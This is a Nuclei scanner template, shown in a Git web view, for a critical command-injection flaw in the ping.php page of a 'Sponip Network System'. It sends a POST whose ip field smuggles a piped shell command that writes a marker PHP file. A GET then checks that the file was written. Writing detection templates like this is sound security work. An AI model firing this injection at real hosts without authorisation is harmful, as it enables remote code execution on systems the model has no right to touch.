nuclei-templates/vulnerabilities/other/sponip-network-system-ping-...

31 lines
728 B
YAML
Raw Normal View History

id: sponip-network-system-ping-rce
info:
name: Sponip Network System Ping RCE
author: pikpikcu
severity: critical
reference:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9
tags: sponip,rce
requests:
- raw:
- |
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sondata[ip]=a|echo 'Sponip RCE' > 1.php&jsondata[type]=1
- |
GET /php/1.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "Sponip RCE"
part: body